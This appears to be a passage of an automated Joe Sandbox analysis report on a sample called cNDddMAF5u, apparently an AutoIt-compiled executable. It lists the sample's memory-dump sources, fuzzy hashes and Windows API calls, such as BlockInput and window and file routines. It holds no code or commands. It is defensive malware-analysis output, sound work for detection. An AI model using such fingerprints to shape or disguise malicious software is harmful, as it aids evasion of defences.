                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: ac01eeeefabd1401c3713fdfc4ec20ab6df57f6da4cd1b45d7c80c86f96b2cc8
                                                        • Instruction ID: 8d7cd00b27e34f0cb1a17a3fe9467e9360fcde8ff90bd3359aa24dc2d269bf34
                                                        • Opcode Fuzzy Hash: ac01eeeefabd1401c3713fdfc4ec20ab6df57f6da4cd1b45d7c80c86f96b2cc8
                                                        • Instruction Fuzzy Hash: D8E01A322002049FD710EF69D805E9AB7EAAF99760F00C41AFC4AD7291DA74AD808B95
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006C03EE), ref: 006C09DA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: e9c28ee0c7d165eaa02debb27d5a68882d7979bc194400c306419d8c266f7029
                                                        • Instruction ID: bbf3de48b4daf82a1d0eb86bcc1ff413850e7a831aafda678fb063d6ba0d5c7a
                                                        • Opcode Fuzzy Hash: e9c28ee0c7d165eaa02debb27d5a68882d7979bc194400c306419d8c266f7029
                                                        • Instruction Fuzzy Hash:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                        • Instruction ID: e9869f0305de4cde637479190e0cfd137c9e1741ec8b51daf3f9451e1ccc4672
                                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                        • Instruction Fuzzy Hash: B6518B7160D7055BDF388569885EFFE239BDB12340F18052EEA86D7382CA25DE02DF5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0&w
                                                        • API String ID: 0-3600112441
                                                        • Opcode ID: 02d88282c74e9cdf9a2aa29203081d3c0f911b59a042ad3464585cbc30f26229
                                                        • Instruction ID: 722fce28e28ccdffea9497a4a1e9b60edb20f85bab1a84d4b3cf3b066a3aa9a1
                                                        • Opcode Fuzzy Hash: 02d88282c74e9cdf9a2aa29203081d3c0f911b59a042ad3464585cbc30f26229
                                                        • Instruction Fuzzy Hash: 3521A8326205118BD728CF79C8226BA73E5E754310F15862EE4A7C37D1DE39A945C784
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4a845e73adcc7a6d770a4b77b1f2612f5410a9588099e745f87c9287e6b76daa
                                                        • Instruction ID: b9446510386943831da2af279f1495a6b48643853e7cd4f00f5e73fb7f55bc5e
                                                        • Opcode Fuzzy Hash: 4a845e73adcc7a6d770a4b77b1f2612f5410a9588099e745f87c9287e6b76daa
                                                        • Instruction Fuzzy Hash: 84324626D29F014DD7239634DC22335A28AAFB73C5F55C737F81AB5AAAEF29C4834101
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 90ce433e64d9b19807ce6f81719c9419b187f166a4f54acf354cd7eecd306c1d
                                                        • Instruction ID: 07195f7c8cd3fd1ffb198e51c55e2fdf2caa1c8ea2231ebf9fd16c5c88119776
                                                        • Opcode Fuzzy Hash: 90ce433e64d9b19807ce6f81719c9419b187f166a4f54acf354cd7eecd306c1d
                                                        • Instruction Fuzzy Hash: 4832F371A0411D8BDF28CB29C6946FD7BA3EB45330F28856AD65ACB395D334DE82DB40
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2682e73c90935cb81071b203696f7424a8f9e5393670f8e715ce0c964669c7ab
                                                        • Instruction ID: 65a85a3bf5d8183c74801eddc4f885e485ce097790ee045a365a61ab79144e6b
                                                        • Opcode Fuzzy Hash: 2682e73c90935cb81071b203696f7424a8f9e5393670f8e715ce0c964669c7ab
                                                        • Instruction Fuzzy Hash: 8C229DB0A00609EFDF14DF65C881AEEB3B6FF45304F244629E816A7291EB35AD51CB64
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df6929ce3d09c3155040b8938f68079ebf2135513f1283fb70dd9234332f07ce
                                                        • Instruction ID: 9fd039036daee3f621c8878ad3d88105c005a23417e5499c0ae179dc7eea6741
                                                        • Opcode Fuzzy Hash: df6929ce3d09c3155040b8938f68079ebf2135513f1283fb70dd9234332f07ce
                                                        • Instruction Fuzzy Hash: 1802A5B0A01205EBDF04DF65D881AAEB7B2FF44300F208169E8169B391EB75AE51CF95
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                        • Instruction ID: a513773043366fada7c78dd8e710db6c4ba83cfd859ed3bbff3a7af006f67eaf
                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                        • Instruction Fuzzy Hash: 619178725080A34AD72946398574A7DFFE2DE533A1319079DE4F3CE2C2EE24D565D620
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                        • Instruction ID: 0f70d78959d114605e315d9d0a84cbd0ce762a29215d43539a28d53fb4fcb133
                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                        • Instruction Fuzzy Hash: 649157726090E34ADB2D427A857497DFFE2DA933A1319079DD4F2CE2C2FD24C965DA20
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 813a7c83618a5536bec8805749762b389ef11958f66339e2548b3714930426c3
                                                        • Instruction ID: 4f8bc44c35cc7858feb2a1cd85d9ce0b317653577311557f197a7e02adf79396
                                                        • Opcode Fuzzy Hash: 813a7c83618a5536bec8805749762b389ef11958f66339e2548b3714930426c3
                                                        • Instruction Fuzzy Hash: 1E61777120874AAADB349EA88995FFE239BDF51710F10091EF842CB381DA11EE428F59
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                        • Instruction ID: e68ed80ef0a088da0342b34574ad827fea8f388107a9294ac5e61759c1671c16
                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                        • Instruction Fuzzy Hash: 8D81657250D0A34ADB6D4239857497EFFE3DA933A131A079ED4F2CE2C2EE24C555E620
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 85af19d856045158542d46d3460f522a9c0a5c3f9b033d50eacd046f9317462a
                                                        • Instruction ID: 98ee2e134a9d29ffcab5c1eee3dafb0a724a1b3746fb01e5ca31b30236d093e3
                                                        • Opcode Fuzzy Hash: 85af19d856045158542d46d3460f522a9c0a5c3f9b033d50eacd046f9317462a
                                                        • Instruction Fuzzy Hash: 0E51966154FEC6AFC30E9B34DA76144FF30BE6351030CC78FC8A54AA86D750A22AD795
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00722B30
                                                        • DeleteObject.GDI32(00000000), ref: 00722B43
                                                        • DestroyWindow.USER32 ref: 00722B52
                                                        • GetDesktopWindow.USER32 ref: 00722B6D
                                                        • GetWindowRect.USER32(00000000), ref: 00722B74
                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00722CA3
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00722CB1
                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722CF8
                                                        • GetClientRect.USER32(00000000,?), ref: 00722D04
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00722D40
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D62
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D75
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D80
                                                        • GlobalLock.KERNEL32(00000000), ref: 00722D89
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D98
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00722DA1
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722DA8
                                                        • GlobalFree.KERNEL32(00000000), ref: 00722DB3
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722DC5
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0073FC38,00000000), ref: 00722DDB
                                                        • GlobalFree.KERNEL32(00000000), ref: 00722DEB
                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00722E11
                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00722E30
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722E52
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0072303F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: a109d62a8243cefa5a1e1e4abd9ec8762a30b42ce6ab3ceaa7c2f7f1cf928d64
                                                        • Instruction ID: e56921f9047e533a0eee8d29a38362c8bec45a93e3b58d7e64c4b110b4e077ba
                                                        • Opcode Fuzzy Hash: a109d62a8243cefa5a1e1e4abd9ec8762a30b42ce6ab3ceaa7c2f7f1cf928d64
                                                        • Instruction Fuzzy Hash: C0028F71900214EFDB15DF64DC89EAE7BB9EB49311F048118F915AB2A2DB38DD41CF64
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0073712F
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00737160
                                                        • GetSysColor.USER32(0000000F), ref: 0073716C
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00737186
                                                        • SelectObject.GDI32(?,?), ref: 00737195
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007371C0
                                                        • GetSysColor.USER32(00000010), ref: 007371C8
                                                        • CreateSolidBrush.GDI32(00000000), ref: 007371CF
                                                        • FrameRect.USER32(?,?,00000000), ref: 007371DE
                                                        • DeleteObject.GDI32(00000000), ref: 007371E5
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00737230
                                                        • FillRect.USER32(?,?,?), ref: 00737262
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00737284
                                                          • Part of subcall function 007373E8: GetSysColor.USER32(00000012), ref: 00737421
                                                          • Part of subcall function 007373E8: SetTextColor.GDI32(?,?), ref: 00737425
                                                          • Part of subcall function 007373E8: GetSysColorBrush.USER32(0000000F), ref: 0073743B
                                                          • Part of subcall function 007373E8: GetSysColor.USER32(0000000F), ref: 00737446
                                                          • Part of subcall function 007373E8: GetSysColor.USER32(00000011), ref: 00737463
                                                          • Part of subcall function 007373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00737471
                                                          • Part of subcall function 007373E8: SelectObject.GDI32(?,00000000), ref: 00737482
                                                          • Part of subcall function 007373E8: SetBkColor.GDI32(?,00000000), ref: 0073748B
                                                          • Part of subcall function 007373E8: SelectObject.GDI32(?,?), ref: 00737498
                                                          • Part of subcall function 007373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007374B7
                                                          • Part of subcall function 007373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007374CE
                                                          • Part of subcall function 007373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007374DB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                        • String ID:
                                                        • API String ID: 4124339563-0
                                                        • Opcode ID: e56aa53b324c2fffc7219235227e8a60ee8ad46ba559933bedc15a5028c87129
                                                        • Instruction ID: 37cae0a67883ee1fb94f064bb539291f1f637889bf192c9cd7dfef3ebe438560
                                                        • Opcode Fuzzy Hash: e56aa53b324c2fffc7219235227e8a60ee8ad46ba559933bedc15a5028c87129
                                                        • Instruction Fuzzy Hash: 09A1C2B2008305EFEB159F60DC48E5B7BB9FB88321F104A19F9A2A61E1D779E840DB51
                                                        APIs
                                                        • DestroyWindow.USER32(?,?), ref: 006B8E14
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 006F6AC5
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006F6AFE
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006F6F43
                                                          • Part of subcall function 006B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006B8BE8,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8FC5
                                                        • SendMessageW.USER32(?,00001053), ref: 006F6F7F
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006F6F96
                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 006F6FAC
                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 006F6FB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 2760611726-4108050209
                                                        • Opcode ID: 5ea91b67da507c2e4b6e4ed10e4376fdedfe86dbc26071c898a1d78a0b599ace
                                                        • Instruction ID: 83ce66b5ccfac9bb31bbf6b38032168892e0502141556a722dc48e12c407587a
                                                        • Opcode Fuzzy Hash: 5ea91b67da507c2e4b6e4ed10e4376fdedfe86dbc26071c898a1d78a0b599ace
                                                        • Instruction Fuzzy Hash: E312A870204255EFDB25DF28C884BFAB7A6FF44300F548469F6899B261CB35E892CF95
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 0072273E
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0072286A
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007228A9
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007228B9
                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00722900
                                                        • GetClientRect.USER32(00000000,?), ref: 0072290C
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00722955
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00722964
                                                        • GetStockObject.GDI32(00000011), ref: 00722974
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00722978
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00722988
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00722991
                                                        • DeleteDC.GDI32(00000000), ref: 0072299A
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007229C6
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 007229DD
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00722A1D
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00722A31
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00722A42
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00722A77
                                                        • GetStockObject.GDI32(00000011), ref: 00722A82
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00722A8D
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00722A97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
